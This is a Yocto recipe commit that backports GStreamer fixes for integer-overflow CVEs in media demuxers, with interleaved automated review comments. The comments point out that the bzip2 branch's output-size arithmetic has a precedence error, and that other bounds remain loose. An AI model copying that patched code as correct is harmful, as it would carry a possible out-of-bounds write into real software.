+See https://gstreamer.freedesktop.org/security/sa-2022-0001.html
+
+Fixes https://gitlab.freedesktop.org/gstreamer/gstreamer/-/issues/1224
+
+Part-of: <https://gitlab.freedesktop.org/gstreamer/gstreamer/-/merge_requests/2608>
+
+https://gitlab.freedesktop.org/gstreamer/gstreamer/-/commit/f503caad676971933dc0b52c4b313e5ef0d6dbb0
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ .../gst/avi/gstavidemux.c | 17 ++++++++++++++---
+ 1 file changed, 14 insertions(+), 3 deletions(-)
+
+diff --git a/gst/avi/gstavidemux.c b/gst/avi/gstavidemux.c
+index eafe865494c..0d18a6495c7 100644
+--- a/gst/avi/gstavidemux.c
++++ b/gst/avi/gstavidemux.c
+@@ -4973,8 +4973,8 @@ swap_line (guint8 * d1, guint8 * d2, guint8 * tmp, gint bytes)
+ static GstBuffer *
+ gst_avi_demux_invert (GstAviStream * stream, GstBuffer * buf)
+ {
+- gint y, w, h;
+- gint bpp, stride;
++ guint y, w, h;
++ guint bpp, stride;
+ guint8 *tmp = NULL;
+ GstMapInfo map;
+ guint32 fourcc;
+@@ -5001,12 +5001,23 @@ gst_avi_demux_invert (GstAviStream * stream, GstBuffer * buf)
+ h = stream->strf.vids->height;
+ w = stream->strf.vids->width;
+ bpp = stream->strf.vids->bit_cnt ? stream->strf.vids->bit_cnt : 8;
++
++ if ((guint64) w * ((guint64) bpp / 8) > G_MAXUINT - 4) {
++ GST_WARNING ("Width x stride overflows");
++ return buf;
++ }
++
++ if (w == 0 || h == 0) {
++ GST_WARNING ("Zero width or height");
++ return buf;
++ }
++
+ stride = GST_ROUND_UP_4 (w * (bpp / 8));
+
+ buf = gst_buffer_make_writable (buf);
+
+ gst_buffer_map (buf, &map, GST_MAP_READWRITE);
+- if (map.size < (stride * h)) {
++ if (map.size < ((guint64) stride * (guint64) h)) {
+ GST_WARNING ("Buffer is smaller than reported Width x Height x Depth");
+ gst_buffer_unmap (buf, &map);
+ return buf;
+--
+GitLab
+
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-1922-1923-1924-1925.patch b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-1922-1923-1924-1925.patch
new file mode 100644
index 0000000000..ebffbc473d
--- /dev/null
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-1922-1923-1924-1925.patch
@@ -0,0 +1,214 @@
+From ad6012159acf18c6b5c0f4edf037e8c9a2dbc966 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Sebastian=20Dr=C3=B6ge?= <sebastian@centricular.com>
+Date: Wed, 18 May 2022 11:24:37 +0300
+Subject: [PATCH] matroskademux: Fix integer overflows in zlib/bz2/etc
+ decompression code
+
+Various variables were of smaller types than needed and there were no
+checks for any overflows when doing additions on the sizes. This is all
+checked now.
+
+In addition the size of the decompressed data is limited to 120MB now as
+any larger sizes are likely pathological and we can avoid out of memory
+situations in many cases like this.
+
+Also fix a bug where the available output size on the next iteration in
+the zlib/bz2 decompression code was provided too large and could
+potentially lead to out of bound writes.
+
+Thanks to Adam Doupe for analyzing and reporting the issue.
+
+CVE: CVE-2022-1922, CVE-2022-1923, CVE-2022-1924, CVE-2022-1925
+
+https://gstreamer.freedesktop.org/security/sa-2022-0002.html
+
+Fixes https://gitlab.freedesktop.org/gstreamer/gstreamer/-/issues/1225
+
+Part-of: <https://gitlab.freedesktop.org/gstreamer/gstreamer/-/merge_requests/2610>
+
+CVE: CVE-2022-1922 CVE-2022-1923 CVE-2022-1924 CVE-2022-1925
+https://gitlab.freedesktop.org/gstreamer/gstreamer/-/commit/ad6012159acf18c6b5c0f4edf037e8c9a2dbc966
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ .../gst/matroska/matroska-read-common.c | 76 +++++++++++++++----
+ 1 file changed, 61 insertions(+), 15 deletions(-)
+
+diff --git a/gst/matroska/matroska-read-common.c b/gst/matroska/matroska-read-common.c
+index eb317644cc5..6fadbba9567 100644
+--- a/gst/matroska/matroska-read-common.c
++++ b/gst/matroska/matroska-read-common.c
+@@ -70,6 +70,10 @@ typedef struct
+ gboolean audio_only;
+ } TargetTypeContext;
+
++/* 120MB as maximum decompressed data size. Anything bigger is likely
++ * pathological, and like this we avoid out of memory situations in many cases
++ */
++#define MAX_DECOMPRESS_SIZE (120 * 1024 * 1024)
+
+ static gboolean
+ gst_matroska_decompress_data (GstMatroskaTrackEncoding * enc,
+@@ -77,19 +81,23 @@ gst_matroska_decompress_data (GstMatroskaTrackEncoding * enc,
+ GstMatroskaTrackCompressionAlgorithm algo)
+ {
+ guint8 *new_data = NULL;
+- guint new_size = 0;
++ gsize new_size = 0;
+ guint8 *data = *data_out;
+- guint size = *size_out;
++ const gsize size = *size_out;
+ gboolean ret = TRUE;
+
++ if (size > G_MAXUINT32) {
++ GST_WARNING ("too large compressed data buffer.");
++ ret = FALSE;
++ goto out;
++ }
++
+ if (algo == GST_MATROSKA_TRACK_COMPRESSION_ALGORITHM_ZLIB) {
+ #ifdef HAVE_ZLIB
+ /* zlib encoded data */
+ z_stream zstream;
+- guint orig_size;
+ int result;
+
+- orig_size = size;
+ zstream.zalloc = (alloc_func) 0;
+ zstream.zfree = (free_func) 0;
+ zstream.opaque = (voidpf) 0;
+@@ -99,8 +107,8 @@ gst_matroska_decompress_data (GstMatroskaTrackEncoding * enc,
+ goto out;
+ }
+ zstream.next_in = (Bytef *) data;
+- zstream.avail_in = orig_size;
+- new_size = orig_size;
++ zstream.avail_in = size;
++ new_size = size;
+ new_data = g_malloc (new_size);
+ zstream.avail_out = new_size;
+ zstream.next_out = (Bytef *) new_data;
+@@ -114,10 +122,18 @@ gst_matroska_decompress_data (GstMatroskaTrackEncoding * enc,
+ break;
+ }
+
++ if (new_size > G_MAXSIZE - 4096 || new_size + 4096 > MAX_DECOMPRESS_SIZE) {
++ GST_WARNING ("too big decompressed data");
++ result = Z_MEM_ERROR;
++ break;
++ }
++
+ new_size += 4096;
+ new_data = g_realloc (new_data, new_size);
+ zstream.next_out = (Bytef *) (new_data + zstream.total_out);
+- zstream.avail_out += 4096;
++ /* avail_out is an unsigned int */
++ g_assert (new_size - zstream.total_out <= G_MAXUINT);
++ zstream.avail_out = new_size - zstream.total_out;
+ } while (zstream.avail_in > 0);
+
+ if (result != Z_STREAM_END) {
+@@ -137,13 +153,11 @@ gst_matroska_decompress_data (GstMatroskaTrackEncoding * enc,
+ #ifdef HAVE_BZ2
+ /* bzip2 encoded data */
+ bz_stream bzstream;
+- guint orig_size;
+ int result;
+
+ bzstream.bzalloc = NULL;
+ bzstream.bzfree = NULL;
+ bzstream.opaque = NULL;
+- orig_size = size;
+
+ if (BZ2_bzDecompressInit (&bzstream, 0, 0) != BZ_OK) {
+ GST_WARNING ("bzip2 initialization failed.");
+@@ -152,8 +166,8 @@ gst_matroska_decompress_data (GstMatroskaTrackEncoding * enc,
+ }
+
+ bzstream.next_in = (char *) data;
+- bzstream.avail_in = orig_size;
+- new_size = orig_size;
++ bzstream.avail_in = size;
++ new_size = size;
+ new_data = g_malloc (new_size);
+ bzstream.avail_out = new_size;
+ bzstream.next_out = (char *) new_data;
+@@ -167,17 +181,31 @@ gst_matroska_decompress_data (GstMatroskaTrackEncoding * enc,
+ break;
+ }
+
++ if (new_size > G_MAXSIZE - 4096 || new_size + 4096 > MAX_DECOMPRESS_SIZE) {
++ GST_WARNING ("too big decompressed data");
++ result = BZ_MEM_ERROR;
++ break;
++ }
++
+ new_size += 4096;
+ new_data = g_realloc (new_data, new_size);
+- bzstream.next_out = (char *) (new_data + bzstream.total_out_lo32);
+- bzstream.avail_out += 4096;
++ bzstream.next_out =
++ (char *) (new_data + ((guint64) bzstream.total_out_hi32 << 32) +
++ bzstream.total_out_lo32);
++ /* avail_out is an unsigned int */
++ g_assert (new_size - ((guint64) bzstream.total_out_hi32 << 32) +
++ bzstream.total_out_lo32 <= G_MAXUINT);
++ bzstream.avail_out =
++ new_size - ((guint64) bzstream.total_out_hi32 << 32) +
++ bzstream.total_out_lo32;
+ } while (bzstream.avail_in > 0);
+
+ if (result != BZ_STREAM_END) {
+ ret = FALSE;
+ g_free (new_data);
+ } else {
+- new_size = bzstream.total_out_lo32;
++ new_size =
++ ((guint64) bzstream.total_out_hi32 << 32) + bzstream.total_out_lo32;
+ }
+ BZ2_bzDecompressEnd (&bzstream);
+
+@@ -189,7 +217,13 @@ gst_matroska_decompress_data (GstMatroskaTrackEncoding * enc,
+ } else if (algo == GST_MATROSKA_TRACK_COMPRESSION_ALGORITHM_LZO1X) {
+ /* lzo encoded data */
+ int result;
+- int orig_size, out_size;
++ gint orig_size, out_size;
++
++ if (size > G_MAXINT) {
++ GST_WARNING ("too large compressed data buffer.");
++ ret = FALSE;
++ goto out;
++ }
+
+ orig_size = size;
+ out_size = size;
+@@ -203,6 +237,11 @@ gst_matroska_decompress_data (GstMatroskaTrackEncoding * enc,
+ result = lzo1x_decode (new_data, &out_size, data, &orig_size);
+
+ if (orig_size > 0) {
++ if (new_size > G_MAXINT - 4096 || new_size + 4096 > MAX_DECOMPRESS_SIZE) {
++ GST_WARNING ("too big decompressed data");
++ result = LZO_ERROR;
++ break;
++ }
+ new_size += 4096;
+ new_data = g_realloc (new_data, new_size);
+ }
+@@ -221,6 +260,13 @@ gst_matroska_decompress_data (GstMatroskaTrackEncoding * enc,
+ } else if (algo == GST_MATROSKA_TRACK_COMPRESSION_ALGORITHM_HEADERSTRIP) {
+ /* header stripped encoded data */
+ if (enc->comp_settings_length > 0) {
++ if (size > G_MAXSIZE - enc->comp_settings_length
++ || size + enc->comp_settings_length > MAX_DECOMPRESS_SIZE) {
++ GST_WARNING ("too big decompressed data");
++ ret = FALSE;
++ goto out;
++ }
++
+ new_data = g_malloc (size + enc->comp_settings_length);
+ new_size = size + enc->comp_settings_length;
+
+--
+GitLab
+
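Review bot: In the bzip2 branch of the embedded fix, the new `avail_out` assignment and the `g_assert` before it both read `new_size - ((guint64) bzstream.total_out_hi32 << 32) + bzstream.total_out_lo32`, which by C precedence subtracts the high word and then adds the low word instead of subtracting the whole 64-bit total. With a zero high word this gives `new_size + total_out_lo32`, more than the space left after `next_out`, which is the "output size provided too large" condition the commit message says it removes. Parenthesising the total in both places, `new_size - (((guint64) bzstream.total_out_hi32 << 32) + bzstream.total_out_lo32)`, would match the zlib branch's `new_size - zstream.total_out`. As this is a backport, the expression should be checked against current upstream rather than changed only locally. The bound also rests on `g_assert`, which does nothing in builds with assertions disabled.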
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-2122.patch b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-2122.patch
new file mode 100644
index 0000000000..f4d38c270e
--- /dev/null
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-2122.patch
@@ -0,0 +1,60 @@
+From 14d306da6da51a762c4dc701d161bb52ab66d774 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Sebastian=20Dr=C3=B6ge?= <sebastian@centricular.com>
+Date: Mon, 30 May 2022 10:15:37 +0300
+Subject: [PATCH] qtdemux: Fix integer overflows in zlib decompression code
+
+Various variables were of smaller types than needed and there were no
+checks for any overflows when doing additions on the sizes. This is all
+checked now.
+
+In addition the size of the decompressed data is limited to 200MB now as
+any larger sizes are likely pathological and we can avoid out of memory
+situations in many cases like this.
+
+Also fix a bug where the available output size on the next iteration in
+the zlib decompression code was provided too large and could
+potentially lead to out of bound writes.
+
+Thanks to Adam Doupe for analyzing and reporting the issue.
+
+CVE: tbd
+
+https://gstreamer.freedesktop.org/security/sa-2022-0003.html
+
+Fixes https://gitlab.freedesktop.org/gstreamer/gstreamer/-/issues/1225
+
+Part-of: <https://gitlab.freedesktop.org/gstreamer/gstreamer/-/merge_requests/2610>
+
+https://gitlab.freedesktop.org/gstreamer/gstreamer/-/commit/14d306da6da51a762c4dc701d161bb52ab66d774
+CVE: CVE-2022-2122
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ gst/isomp4/qtdemux.c | 8 +++++++-
+ 1 file changed, 7 insertions(+), 1 deletion(-)
+
+diff --git a/gst/isomp4/qtdemux.c b/gst/isomp4/qtdemux.c
+index 7cc346b1e63..97ba0799a8d 100644
+--- a/gst/isomp4/qtdemux.c
++++ b/gst/isomp4/qtdemux.c
+@@ -7905,10 +7905,16 @@ qtdemux_inflate (void *z_buffer, guint z_length, guint * length)
+ break;
+ }
+
++ if (*length > G_MAXUINT - 4096 || *length > QTDEMUX_MAX_SAMPLE_INDEX_SIZE) {
++ GST_WARNING ("too big decompressed data");
++ ret = Z_MEM_ERROR;
++ break;
++ }
++
+ *length += 4096;
+ buffer = (guint8 *) g_realloc (buffer, *length);
+ z.next_out = (Bytef *) (buffer + z.total_out);
+- z.avail_out += 4096;
++ z.avail_out += *length - z.total_out;
+ } while (z.avail_in > 0);
+
+ if (ret != Z_STREAM_END) {
+--
+GitLab
+
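Review bot: The replacement line `z.avail_out += *length - z.total_out;` still adds to whatever `avail_out` already held, whereas the matroska fix added by this same commit assigns the remaining space outright. The sum is only right if `avail_out` is zero every time the loop reaches this line, which depends on the `inflate` call outside this hunk; `z.avail_out = *length - z.total_out;` would not rely on that. The size check also tests `*length` before the 4096 increment, so the buffer can end one step above `QTDEMUX_MAX_SAMPLE_INDEX_SIZE`, and the header keeps the placeholder `CVE: tbd` next to `CVE: CVE-2022-2122`.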
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good_1.16.3.bb b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good_1.16.3.bb
index 75dd029109..831a317a82 100644
--- a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good_1.16.3.bb
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good_1.16.3.bb
@@ -1,9 +1,19 @@
require gstreamer1.0-plugins-common.inc
+DESCRIPTION = "'Good' GStreamer plugins"
+HOMEPAGE = "https://gstreamer.freedesktop.org/"
+BUGTRACKER = "https://gitlab.freedesktop.org/gstreamer/gst-plugins-good/-/issues"
+
SRC_URI = " \
https://gstreamer.freedesktop.org/src/gst-plugins-good/gst-plugins-good-${PV}.tar.xz \
file://0001-qmlgl-ensure-Qt-defines-GLsync-to-fix-compile-on-som.patch \
file://0001-qt-include-ext-qt-gstqtgl.h-instead-of-gst-gl-gstglf.patch \
+ file://CVE-2021-3497.patch \
+ file://CVE-2021-3498.patch \
+ file://CVE-2022-1920.patch \
+ file://CVE-2022-1921.patch \
+ file://CVE-2022-1922-1923-1924-1925.patch \
+ file://CVE-2022-2122.patch \
"
SRC_URI[md5sum] = "c79b6c2f8eaadb2bb66615b694db399e"
@@ -30,6 +40,8 @@ X11DEPENDS = "virtual/libx11 libsm libxrender libxfixes libxdamage"
X11ENABLEOPTS = "-Dximagesrc=enabled -Dximagesrc-xshm=enabled -Dximagesrc-xfixes=enabled -Dximagesrc-xdamage=enabled"
X11DISABLEOPTS = "-Dximagesrc=disabled -Dximagesrc-xshm=disabled -Dximagesrc-xfixes=disabled -Dximagesrc-xdamage=disabled"
+QT5WAYLANDDEPENDS = "${@bb.utils.contains("DISTRO_FEATURES", "wayland", "qtwayland", "", d)}"
+
PACKAGECONFIG[bz2] = "-Dbz2=enabled,-Dbz2=disabled,bzip2"
PACKAGECONFIG[cairo] = "-Dcairo=enabled,-Dcairo=disabled,cairo"
PACKAGECONFIG[dv1394] = "-Ddv1394=enabled,-Ddv1394=disabled,libiec61883 libavc1394 libraw1394"
@@ -44,7 +56,7 @@ PACKAGECONFIG[libpng] = "-Dpng=enabled,-Dpng=disabled,libpng"
PACKAGECONFIG[libv4l2] = "-Dv4l2-libv4l2=enabled,-Dv4l2-libv4l2=disabled,v4l-utils"
PACKAGECONFIG[mpg123] = "-Dmpg123=enabled,-Dmpg123=disabled,mpg123"
PACKAGECONFIG[pulseaudio] = "-Dpulse=enabled,-Dpulse=disabled,pulseaudio"
-PACKAGECONFIG[qt5] = "-Dqt5=enabled,-Dqt5=disabled,qtbase qtdeclarative qtbase-native"
+PACKAGECONFIG[qt5] = "-Dqt5=enabled,-Dqt5=disabled,qtbase qtdeclarative qtbase-native ${QT5WAYLANDDEPENDS}"
PACKAGECONFIG[soup] = "-Dsoup=enabled,-Dsoup=disabled,libsoup-2.4"
PACKAGECONFIG[speex] = "-Dspeex=enabled,-Dspeex=disabled,speex"
PACKAGECONFIG[taglib] = "-Dtaglib=enabled,-Dtaglib=disabled,taglib"
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-ugly_1.16.3.bb b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-ugly_1.16.3.bb
index d9ec82d887..afde9a013d 100644
--- a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-ugly_1.16.3.bb
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-ugly_1.16.3.bb
@@ -1,5 +1,9 @@
require gstreamer1.0-plugins-common.inc
+DESCRIPTION = "'Ugly GStreamer plugins"
+HOMEPAGE = "https://gstreamer.freedesktop.org/"
+BUGTRACKER = "https://gitlab.freedesktop.org/gstreamer/gst-plugins-ugly/-/issues"
+
LIC_FILES_CHKSUM = "file://COPYING;md5=a6f89e2100d9b6cdffcea4f398e37343 \
file://tests/check/elements/xingmux.c;beginline=1;endline=21;md5=4c771b8af188724855cb99cadd390068"
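Review bot: The added `DESCRIPTION = "'Ugly GStreamer plugins"` has an unmatched single quote; the plugins-good recipe in this commit writes `"'Good' GStreamer plugins"`, so this line should read `DESCRIPTION = "'Ugly' GStreamer plugins"`. The string ends up in the package metadata, so the typo is visible to users of the built packages.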
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-python_1.16.3.bb b/meta/recipes-multimedia/gstreamer/gstreamer1.0-python_1.16.3.bb
index 14b34a2808..9c7f0e078c 100644
--- a/meta/recipes-multimedia/gstreamer/gstreamer1.0-python_1.16.3.bb
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-python_1.16.3.bb
@@ -1,4 +1,6 @@
SUMMARY = "Python bindings for GStreamer 1.0"
+DESCRIPTION = "GStreamer Python binding overrides (complementing the bindings \
+provided by python-gi) "
HOMEPAGE = "http://cgit.freedesktop.org/gstreamer/gst-python/"
SECTION = "multimedia"
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-rtsp-server_1.16.3.bb b/meta/recipes-multimedia/gstreamer/gstreamer1.0-rtsp-server_1.16.3.bb
index 5f1b1d44fa..ed51a5693e 100644
--- a/meta/recipes-multimedia/gstreamer/gstreamer1.0-rtsp-server_1.16.3.bb
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-rtsp-server_1.16.3.bb
@@ -29,3 +29,5 @@ GIR_MESON_DISABLE_FLAG = "disabled"
# Starting with 1.8.0 gst-rtsp-server includes dependency-less plugins as well
require gstreamer1.0-plugins-packaging.inc
+
+CVE_PRODUCT += "gst-rtsp-server"
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-vaapi_1.16.3.bb b/meta/recipes-multimedia/gstreamer/gstreamer1.0-vaapi_1.16.3.bb
index 9d9b1b8757..af9b2c5a97 100644
--- a/meta/recipes-multimedia/gstreamer/gstreamer1.0-vaapi_1.16.3.bb
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-vaapi_1.16.3.bb
@@ -1,4 +1,5 @@
SUMMARY = "VA-API support to GStreamer"
+HOMEPAGE = "https://gstreamer.freedesktop.org/"
DESCRIPTION = "gstreamer-vaapi consists of a collection of VA-API \
based plugins for GStreamer and helper libraries: `vaapidecode', \
`vaapiconvert', and `vaapisink'."
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0/0006-tests-seek-Don-t-use-too-strict-timeout-for-validati.patch b/meta/recipes-multimedia/gstreamer/gstreamer1.0/0006-tests-seek-Don-t-use-too-strict-timeout-for-validati.patch
new file mode 100644
index 0000000000..e32f3c101f
--- /dev/null
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0/0006-tests-seek-Don-t-use-too-strict-timeout-for-validati.patch
@@ -0,0 +1,33 @@
+From 1db36347d05d88835519368442e9aa89c64091ad Mon Sep 17 00:00:00 2001
+From: Seungha Yang <seungha@centricular.com>
+Date: Tue, 15 Sep 2020 00:54:58 +0900
+Subject: [PATCH] tests: seek: Don't use too strict timeout for validation
+
+Expected segment-done message might not be seen within expected
+time if system is not powerful enough.
+
+Part-of: <https://gitlab.freedesktop.org/gstreamer/gstreamer/-/merge_requests/625>
+
+Upstream-Status: Backport [https://cgit.freedesktop.org/gstreamer/gstreamer/commit?id=f44312ae5d831438fcf8041162079c65321c588c]
+Signed-off-by: Anuj Mittal <anuj.mittal@intel.com>
+Signed-off-by: Jose Quaresma <quaresma.jose@gmail.com>
+---
+ tests/check/pipelines/seek.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/tests/check/pipelines/seek.c b/tests/check/pipelines/seek.c
+index 28bb8846d..5f7447bc5 100644
+--- a/tests/check/pipelines/seek.c
++++ b/tests/check/pipelines/seek.c
+@@ -521,7 +521,7 @@ GST_START_TEST (test_loopback_2)
+
+ GST_INFO ("wait for segment done message");
+
+- msg = gst_bus_timed_pop_filtered (bus, (GstClockTime) 2 * GST_SECOND,
++ msg = gst_bus_timed_pop_filtered (bus, GST_CLOCK_TIME_NONE,
+ GST_MESSAGE_SEGMENT_DONE | GST_MESSAGE_ERROR);
+ fail_unless (msg, "no message within the timed window");
+ fail_unless_equals_string (GST_MESSAGE_TYPE_NAME (msg), "segment-done");
+--
+2.29.2
+
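Review bot: Passing `GST_CLOCK_TIME_NONE` makes the wait unbounded, so the following `fail_unless (msg, "no message within the timed window")` can no longer catch a missing message; a lost segment-done now hangs the test instead of failing it. A generous finite bound, for example `(GstClockTime) 60 * GST_SECOND`, would relax the timing for slow targets while keeping a deterministic failure. The change is an upstream backport, so the trade-off is inherited, but ptest runs will then depend on the harness timeout to recover from a stuck pipeline.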
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0_1.16.3.bb b/meta/recipes-multimedia/gstreamer/gstreamer1.0_1.16.3.bb
index 7afe56cd7b..14793b7fdf 100644
--- a/meta/recipes-multimedia/gstreamer/gstreamer1.0_1.16.3.bb
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0_1.16.3.bb
@@ -22,6 +22,7 @@ SRC_URI = " \
file://0003-meson-Add-valgrind-feature.patch \
file://0004-meson-Add-option-for-installed-tests.patch \
file://0005-bufferpool-only-resize-in-reset-when-maxsize-is-larger.patch \
+ file://0006-tests-seek-Don-t-use-too-strict-timeout-for-validati.patch \
"
SRC_URI[md5sum] = "beecf6965a17fb17fa3b262fd36df70a"
SRC_URI[sha256sum] = "692f037968e454e508b0f71d9674e2e26c78475021407fcf8193b1c7e59543c7"
@@ -40,7 +41,7 @@ PACKAGECONFIG[unwind] = "-Dlibunwind=enabled,-Dlibunwind=disabled,libunwind"
PACKAGECONFIG[dw] = "-Dlibdw=enabled,-Dlibdw=disabled,elfutils"
PACKAGECONFIG[bash-completion] = "-Dbash-completion=enabled,-Dbash-completion=disabled,bash-completion"
PACKAGECONFIG[tools] = "-Dtools=enabled,-Dtools=disabled"
-PACKAGECONFIG[setcap] = ",,libcap libcap-native"
+PACKAGECONFIG[setcap] = "-Dptp-helper-permissions=capabilities,,libcap libcap-native"
# TODO: put this in a gettext.bbclass patch
def gettext_oemeson(d):
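Review bot: The `setcap` PACKAGECONFIG now passes `-Dptp-helper-permissions=capabilities` when enabled but leaves the disabled field empty, so with `setcap` off the helper's privilege mode is whatever the project's meson default selects. Because this option decides how a privileged helper binary is installed, it is worth stating the disabled case explicitly, for instance `-Dptp-helper-permissions=none` if the PTP helper is not needed on the target. The meson default is not visible in this hunk, so the right value needs confirming against the gstreamer build options.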
@@ -74,4 +75,20 @@ FILES_${PN}-dbg += "${datadir}/gdb ${datadir}/gstreamer-1.0/gdb"
CVE_PRODUCT = "gstreamer"
+# CPE entries for gst-plugins-base are listed as gstreamer issues
+# so we need to ignore the false hits
+CVE_CHECK_WHITELIST += "CVE-2021-3522"
+
+# CPE entries for gst-plugins-good are listed as gstreamer issues
+# so we need to ignore the false hits
+CVE_CHECK_WHITELIST += "CVE-2021-3497"
+CVE_CHECK_WHITELIST += "CVE-2021-3498"
+CVE_CHECK_WHITELIST += "CVE-2022-1920"
+CVE_CHECK_WHITELIST += "CVE-2022-1921"
+CVE_CHECK_WHITELIST += "CVE-2022-1922"
+CVE_CHECK_WHITELIST += "CVE-2022-1923"
+CVE_CHECK_WHITELIST += "CVE-2022-1924"
+CVE_CHECK_WHITELIST += "CVE-2022-1925"
+CVE_CHECK_WHITELIST += "CVE-2022-2122"
+
require gstreamer1.0-ptest.inc
diff --git a/meta/recipes-multimedia/lame/lame_3.100.bb b/meta/recipes-multimedia/lame/lame_3.100.bb
index 7f8996fb52..d007e0a495 100644
--- a/meta/recipes-multimedia/lame/lame_3.100.bb
+++ b/meta/recipes-multimedia/lame/lame_3.100.bb
@@ -1,5 +1,6 @@
SUMMARY = "High quality MP3 audio encoder"
-HOMEPAGE = "http://lame.sourceforge.net/"
+DESCRIPTION = "LAME is an educational tool to be used for learning about MP3 encoding."
+HOMEPAGE = "https://lame.sourceforge.io/"
BUGTRACKER = "http://sourceforge.net/tracker/?group_id=290&atid=100290"
SECTION = "console/utils"
LICENSE = "LGPLv2+"
diff --git a/meta/recipes-multimedia/liba52/liba52_0.7.4.bb b/meta/recipes-multimedia/liba52/liba52_0.7.4.bb
index 8ff8889b60..0ef5d947c3 100644
--- a/meta/recipes-multimedia/liba52/liba52_0.7.4.bb
+++ b/meta/recipes-multimedia/liba52/liba52_0.7.4.bb
@@ -1,4 +1,7 @@
SUMMARY = "ATSC A/52 surround sound stream decoder"
+DESCRIPTION = "Library for decoding ATSC A/52 streams. The A/52 standard \
+is used in a variety of applications, including digital television \
+and DVD. It is also known as AC-3."
HOMEPAGE = "http://liba52.sourceforge.net/"
LICENSE = "GPLv2+"
LIC_FILES_CHKSUM = "file://COPYING;md5=0636e73ff0215e8d672dc4c32c317bb3 \
diff --git a/meta/recipes-multimedia/libid3tag/libid3tag/cflags_filter.patch b/meta/recipes-multimedia/libid3tag/libid3tag/cflags_filter.patch
new file mode 100644
index 0000000000..0d1d0dc381
--- /dev/null
+++ b/meta/recipes-multimedia/libid3tag/libid3tag/cflags_filter.patch
@@ -0,0 +1,21 @@
+configure contains CFLAGS filtering code which was removing our prefix-map
+flags. We need those to generate reproducible binaries. Allow them through.
+
+Upstream-Status: Pending
+Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
+
+Index: libid3tag-0.15.1b/configure.ac
+===================================================================
+--- libid3tag-0.15.1b.orig/configure.ac
++++ libid3tag-0.15.1b/configure.ac
+@@ -99,6 +99,10 @@ do
+ -mno-cygwin)
+ shift
+ ;;
++ -fmacro-prefix-map*|-fdebug-prefix-map*)
++ CFLAGS="$CFLAGS $1"
++ shift
++ ;;
+ -m*)
+ arch="$arch $1"
+ shift
diff --git a/meta/recipes-multimedia/libid3tag/libid3tag_0.15.1b.bb b/meta/recipes-multimedia/libid3tag/libid3tag_0.15.1b.bb
index 0312a610c0..80581765ac 100644
--- a/meta/recipes-multimedia/libid3tag/libid3tag_0.15.1b.bb
+++ b/meta/recipes-multimedia/libid3tag/libid3tag_0.15.1b.bb
@@ -15,6 +15,7 @@ SRC_URI = "${SOURCEFORGE_MIRROR}/mad/libid3tag-${PV}.tar.gz \
file://0001-Fix-gperf-3.1-incompatibility.patch \
file://10_utf16.patch \
file://unknown-encoding.patch \
+ file://cflags_filter.patch \
"
UPSTREAM_CHECK_URI = "https://sourceforge.net/projects/mad/files/libid3tag/"
UPSTREAM_CHECK_REGEX = "/projects/mad/files/libid3tag/(?P<pver>.*)/$"
diff --git a/meta/recipes-multimedia/libomxil/libomxil_0.9.3.bb b/meta/recipes-multimedia/libomxil/libomxil_0.9.3.bb
index 271c2a30a3..8f3b76a920 100644
--- a/meta/recipes-multimedia/libomxil/libomxil_0.9.3.bb
+++ b/meta/recipes-multimedia/libomxil/libomxil_0.9.3.bb
@@ -4,7 +4,7 @@ DESCRIPTION = "Bellagio is an opensource implementation of the Khronos OpenMAX \
HOMEPAGE = "http://omxil.sourceforge.net/"
LICENSE = "LGPLv2.1+"
-LICENSE_FLAGS = "commercial"
+LICENSE_FLAGS = "${@bb.utils.contains('PACKAGECONFIG', 'amr', 'commercial', '', d)}"
LIC_FILES_CHKSUM = "file://COPYING;md5=ae6f0f4dbc7ac193b50f323a6ae191cb \
file://src/omxcore.h;beginline=1;endline=27;md5=806b1e5566c06486fe8e42b461e03a90"
@@ -26,6 +26,10 @@ EXTRA_OECONF += "--disable-doc --disable-Werror"
PROVIDES += "virtual/libomxil"
+PACKAGECONFIG ??= ""
+
+PACKAGECONFIG[amr] = "--enable-amr,,"
+
#
# The .so files under ${libdir}/bellagio are not intended to be versioned and symlinked.
# Make sure they get packaged in the main package.
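Review bot: `LICENSE_FLAGS` (first hunk of this file) now drops `commercial` unless `amr` is in `PACKAGECONFIG`, but `PACKAGECONFIG[amr] = "--enable-amr,,"` passes nothing to configure when the option is off. If configure enables AMR by default or by auto-detection, which is not visible here, the package would contain that code without the licence flag. Giving the disabled field an explicit value, `PACKAGECONFIG[amr] = "--enable-amr,--disable-amr,"`, keeps the build and the declared licence in step, assuming the option is a standard autoconf enable switch.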
